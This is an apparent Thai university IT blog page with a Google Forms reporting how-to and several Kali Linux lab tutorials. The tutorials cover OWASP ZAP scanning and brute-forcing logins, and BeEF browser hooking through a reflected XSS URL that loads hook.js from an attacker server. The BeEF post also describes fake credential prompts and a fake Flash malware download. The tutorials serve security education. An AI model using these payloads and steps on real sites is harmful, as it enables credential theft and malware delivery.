CoP PSU IT Blog – Page 133 – แหล่งรวมบทความเกี่ยวกับ IT โดยชาว PSU IT

วิธีใช้ Google Sites เพื่อแสดงรายงานผลการลงทะเบียนจาก Google Form

November 3, 2016 16:03

ปัจจุบันการสร้างแบบฟอร์มการรับลงทะเบียนออนไลน์สามารถทำได้ง่ายๆโดยใช้ Google Form โดยวันนี้มีโจทย์ว่า ต้องการรับลงทะเบียนผู้ที่จะร่วมเดินทาง กำหนดว่า ต้องการเดินทางกับรถบัสหมายเลขใด (มี 3 คัน) และต้องการแสดงผลทันทีว่า แต่ละคันมีจำนวนคนเท่าไหร่แล้ว และ ใครบ้างที่เดินทางไปในรถบัสคันนั้น วิธีการคือ สร้าง Google Form เพื่อทำระบบรับลงทะเบียนตามปรกติ ในส่วนของการสร้างแบบฟอร์ม ให้คลิกที่ RESPONSES แล้วคลิกที่รูป สี่เหลี่ยมสีเขียว (Google Sheets) แล้วจัดรูปแบบให้เรียบร้อย เช่นต้องการจะซ่อน Column ใดบ้าง (จะใส่สี ก็ได้นะ) เสร็จแล้ว คลิกที่ปุ่ม Share กำหนดให้ Anyone with Link “Can View” แล้วคลิก Done สร้าง Google Sites และสร้างโครงสร้าง Page ต่างๆตามต้องการ ในตัวอย่างนี้ จะสร้าง Page “รายชื่อ” เพื่อไว้ใช้แสดงผลการลงทะเบียน ว่า รถหมายเลขใด มีจำนวนกี่คนแล้ว และใครบ้าง ให้เลือก Insert > More gadgets แล้วคลิกที่ Public > Include gadget (Iframe) จากนั้น มาใส่ URL กัน ใส่ URL ตามนี้https://spreadsheets.google.com/tq?tqx=out:html&tq=select L,count(B) group by L label count(B) ‘จำนวน’&key=XXXXXXXXXXXXXXXXXX เพื่อให้แสดงผลว่า รถบัสหมายเลขใด มีจำนวนคนเท่าไหร่ โดยที่ tq เป็น Query เขียนว่า select L, count(B) group by L label count(B) ‘จำนวน’ คือการแสดงคอลัมน์ L และ นับจำนวนโดยการ count โดยจัดกลุ่มตามคอลัมน์ L นอกจากนั้นยัง label คอลัมน์ count(B) เป็นคำว่า “จำนวน” ผลที่ได้คือ และ key=XXXXXXXXXXX นั้น ให้เอาค่าจาก ต่อไปให้แสดงผลรายชื่อทั้งหมด โดยสามารถแยกรายชื่อแต่ละคัน โดย Insert > Drive > Spreadsheet แล้วเลือก Google Sheet ที่ต้องการ เมื่อดำเนินการเสร็จแล้ว ระบบก็จะสามารถแสดงผลการลงทะเบียนได้อัตโนมัติ

วิธีใช้งาน Kali Linux – BeEF – XSS Framework

October 24, 2016 12:07

จาก วิธีใช้งาน Kali Linux – OWASP Zap – Active Scan ได้แสดงให้เห็นว่า เมื่อตรวจเจอช่องโหว่ Cross Site Scripting (XSS) บนเครื่องเป้าหมาย จากที่ได้เคยบรรยายไปใน Web Hacking and Security Workshop เรื่อง วิธีตรวจสอบเว็บไซต์ที่โดน Hack #9 : วิธีการ Hack ด้วย SQL Injection และ Cross-Site Scripting ซึ่งแสดงให้เห็นว่า หากมีช่องโหว่ดังกล่าว ทำให้สามารถใส่ JavaScript ลงไปได้ ซึ่งอาจจะดูไม่น่าจะอันตรายอะไร แต่ ถ้า Hacker พบช่องโหว่ XSS (reflected) นี้บน Website ของเรา แล้วส่ง URL ที่แนบ JavaScript ไปหลอกผู้ใช้ของเรา อาจจะเป็นทาง Email ก็จะเป็นปัญหาได้ ต่อไปนี้ จะแนะนำอีกเครื่องมือหนึ่ง ที่ชื่อว่า BeEF XSS Framework ใน Kali Linux ดังวิธีการใช้งาน “เบื้องต้น” ให้เห็นอันตรายของช่องโหว่นี้ ดังนี้ เปิด Application > 08 Exploitation Tools > beef xss framework เมื่อระบบทำงานแล้ว ให้ copy Example Hook ไว้ก่อน แล้วมา Login BeEF Website โดยใส่ username/password เป็น beef/beef ต่อไป อาจจะส่ง email ไปหลอกผู้ใช้ของระบบ โดยใส่ Link เป็น http://192.168.56.101/xss/simple.php?name=<script src=”http://192.168.56.102:3000/hook.js”></script> โดยในที่นี้ 192.168.56.101 เป็น Website ที่มีช่องโหว่ XSS 192.168.56.102 เป็น BeEF Server ของ Hacker ที่เปิด port 3000 รอให้ Download hook.js ไปติดตั้ง หากผู้ใช้โดนหลอกให้คลิก จะปรากฏภาพดังนี้ เมื่อมีผู้ใช้โดนหลอกให้คลิกเรียบร้อย ทาง Hacker ที่ใช้ BeEF จะเห็นหน้าจอดังนี้ BeEF สามารถรู้รายละเอียดของ Browser ของเป้าหมายได้ ในเมนู Command สามารถทำอะไรได้หลายอย่าง เมื่อเลือก Browser > Hooked Domain > Get Page HREFs แล้วคลิก Execute จากนั้น มาดูผลงานใน Command results ก็จะเห็นว่า ใน Page ของผู้ใช้ มี Link เดิมเป็น http://xssattackexamples.com เป็นต้น จากนั้น เลือก Replace HREFs เป็น http://beefproject.com/ แล้วคลิก Execute ตรวจสอบผลงาน พบว่า Link ถูกเปลี่ยนไป 2 ตำแหน่ง ผู้ใช้จะเห็น Link เปลี่ยนไปดังภาพ สั่งให้ Pop Dialog ถามรหัสผ่านผู้ใช้ (แบบบ้านๆ) สั่งให้หลอกถาม username/password ของ Google สั่งให้หลอกถามแบบ Facebook และหลอกให้ download Flash Player แต่จริงๆแล้วเป็น Virus/Malware/Ransomware

วิธีใช้งาน Kali Linux – OWASP Zap – Brute Force with Fuzz

October 21, 2016 16:24

ในการตรวจสอบ ความแข็งแกร่งของระบบป้องกันการโจมตี เรื่องหนึ่งคือความสามารถในการกัน Brute Force หรือ ความพยายามเดารหัสผ่าน OWASP Zap สามารถใช้เป็นเครื่องมือในการทำ Brute Force ได้ โดยใช้เครื่องมือที่ชื่อว่า Fuzz ขั้นตอนมีดังนี้ เปิด Zap และเปิด Web Browser ที่ตั้งค่าให้ Zap เป็น Proxy และ ทำการ Authentication ทดสอบดู ใน Zap จะปรากฏ POST Action ที่สำหรับส่ง Username และ Password เกิดขึ้น เลือก Username ที่ทดสอบใส่ลงไป แล้วคลิกขวา เลือก Fuzz จากนั้นคลิก Payloads จากนั้น คลิกปุ่ม Add เลือก Type เป็น Strings แล้วใส่ Username ที่จะใช้ในการเดา เสร็จแล้วคลิกปุ่ม Add จากนั้น เลือกข้อความที่เป็น Password แล้วคลิก Add แล้วคลิก Payload แล้วใส่ Password ที่จะเดา เสร็จแล้วคลิกปุ่ม Add เมื่อตั้งค่าเสร็จแล้ว คลิกปุ่ม Start Fuzz Zap จะทำการเดา Username/Password เมื่อเสร็จแล้ว ลองสังเกตผลใน Tab Fuzzer ผลที่ได้อาจจะแตกต่างกันในแต่ละระบบที่โจมตี แต่ในภาพ จะเห็นว่า มี Size Response Header อยู่บรรทัดหนึ่งที่มีขนาดแตกต่างจากอันที่ไม่สำเร็จ คือ 390 bytes (บรรทัดอื่นๆเป็น 310 bytes) เมื่อลองคลิกดู แล้วไปดูใน Tab Response จะเห็นว่า มีการ Set-Cookie แสดงว่า Login ได้แล้ว ใน Column Payloads จะเห็นว่า รหัสผ่านเป็น admin,123456 สามารถเอาไปทดสอบได้ ในตัวอย่างนี้ ถ้ามีระบบป้องกันการเดารหัสผ่าน เช่น fail2ban ก็จะสามารถลดความเสี่ยงได้ (บ้าง)

วิธีใช้งาน Kali Linux – OWASP Zap – User Authentication

October 19, 2016 14:48

ในการตรวจสอบ Web Application ที่ต้องมีการ Authentication โดยใช้งานผ่าน Web Form จะต้องกำหนดค่าให้ OWASP Zap รู้ว่า จุดใดเป็น Login Form และ Field ใดที่ใช้เป็น Username และ Password ก่อน หลังจากนั้น จะสามารถกำหนดได้ว่า จะโจมตีด้วย Username ใดบ้าง เพื่อใช้ในการทดสอบ ขั้นตอนในการตั้งค่าและโจมตีมีดังนี้ ใน Web Browser ให้ตั้งค่า Proxy เป็น 127.0.0.1 Port 8080 ทำการเปิด Web Page ที่ต้องการโจมดี โดยให้ทำเป็น Login ตามปรกติ ด้วย Username/Password ที่ใช้งานได้จริง เมื่อ Login สำเร็จแล้ว จะได้หน้าตาประมาณนี้ จากนั้น กลับไปที่ OWASP Zap จะเห็นว่าใน Sites มี URL ของ Website ที่ต้องการโจมตีปรากฏอยู่ จากนั้นให้ คลิกขวาที่ URL ที่ต้องการโจมตี คลิก Include in Context > Default Context จะปรากฏหน้าต่าง Session Properties ให้ทราบว่า จะใช้งาน URL นี้ ให้คลิกปุ่ม OK จากนั้นให้คลิก POST Action ที่เป็นการส่งข้อมูลการ Login ผ่าน Web Form แล้ว คลิกขวา เลือก Flag as context > Default Context : Form-based Auth login Request จะปรากฏหน้าต่าง Session Properties อีกครั้ง ให้ทราบว่า จะใช้ Login Form Target URL และ Login Request POST DATA ดังภาพ ให้กำหนดว่า Username Parameter และ Password Parameter คือ Field ใด จากนั้น ให้คลิกปุ่ม OK จากนั้น ให้คลิก Tab Response ของ POST Action ที่ใช้ในการ Login แล้วมองหา ข้อความ ที่จะให้ OWASP Zap ค้นหา เพื่อเป็นการยืนยังว่า สามารถ Login ได้แล้ว จากนั้น คลิกขวา แล้วเลือก Flag as Context > Default Context: Authentication Logged-in indicator จะปรากฏหน้าต่าง Session Properties อีกครั้ง ให้ทราบว่า Regex pattern identified in Logged in response message คือคำใด จากนั้น ให้คลิกปุ่ม OK จากนั้น คลิก Users ด้านซ้ายมือ แล้ว คลิก เครื่องหมายถูก หน้า Username ที่จะใช้ในการ Login จากนั้น คลิก Forced Users ด้านซ้ายมือ แล้วเลือก User ที่จะใช้ในการโจมตี แล้วคลิก OK

วิธีใช้งาน Kali Linux – OWASP Zap – Active Scan

October 17, 2016 11:17

ใน Kali Linux มีเครื่องมือ Web Application Security Scanner ที่น่าสนใจตัวหนึ่ง คือ OWASP Zap (Open Web Application Security Project) เหมาะสำหรับการใช้งานตั้งแต่การทดสอบเบื้องต้น ไปจนถึงการโจมตีขั้นสูงได้ *** คำเตือน : อย่าใช้เครื่องมือนี้กับระบบคอมพิวเตอร์ที่ท่านไม่ใช่เจ้าข้องเด็ดขาด *** ในบทความนี้ จะแสดงขั้นตอนการทดสอบ Web Application โดยใช้กระบวนการ Active Scan ใน Kali Linux เปิด Applications > 03 Web Application Analysis > owasp-zap เลือก No, I do not want to persist this session at this moment in time แล้วคลิก Start (ยังไม่ต้องใช้ในตอนนี้) ในช่อง URL to attack ใส่ URL ของ Web Application ที่ต้องการทดสอบ แล้วคลิก Attack ระบบจะทำการ Spider และ Active Scan ตามลำดับ ผลที่ได้ “ในเบื้องต้น” ก็จะแค่แสดงในส่วนของ Alerts ทั่วไปเกี่ยวกับการตั้งค่าที่อาจจะไม่เหมาะสม เช่น X-Frame-Options Header ไม่ได้ตั้งค่าไว้, มีการใช้ Private IP, ไม่ได้ป้องกัน XSS และอื่นๆเป็นต้น เนื่องจากเครื่องที่ทำการทดสอบนี้ จริงๆแล้ว มี Directory ย่อยๆ ลงไปอีกมากมาย ที่ไม่ได้ชี้ Link ไปจาก index.php ในหน้าแรกของ Web Site วิธีการที่จะให้ OWASP ZAP กวาดไฟล์เดอร์ย่อยๆออกมา ใช้คลิกขวาที่ Sites ที่ต้องการ แล้ว Attack > Forced Browse site จากนั้นจะปรากฏ Forced Browse Tab ขึ้นมา ให้เลือก directory-list-1.0.txt ซึ่งจะทำการ Brute Force ชื่อ Directory ที่เค้าไปเก็บรวบรวมมา จากนั้น ทำการ Attack ด้วย Spider อีกครั้ง จากนั้น ทำการ Attack ด้วย Active Scan อีกครั้ง แต่ให้ตั้งค่าใน Policy Tab ดังภาพ เพื่อให้ Threshold เป็น High และ Strength เป็น Insane (จะอธิบายละเอียดอีกครั้งในบทความต่อไป) คลิก Go ทั้ง 2 บรรทัด แล้วคลิก Start Scan ดูผลการ Scan ได้ที่ Alerts Tab ดังตัวอย่างพบว่ามีช่องโหว่สำคัญคือ Cross Site Scripting (Reflected), Path Traversal และ Remote File Inclusion โดยบอกวิธีการ Attack ที่ใช้ในการทดสอบ และวิธีการแก้ไขพร้อม จะกลับมาอภิปราย และอธิบายรายละเอียดอีกครั้งในบทความต่อไป References: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project https://github.com/zaproxy/zap-core-help/wiki https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project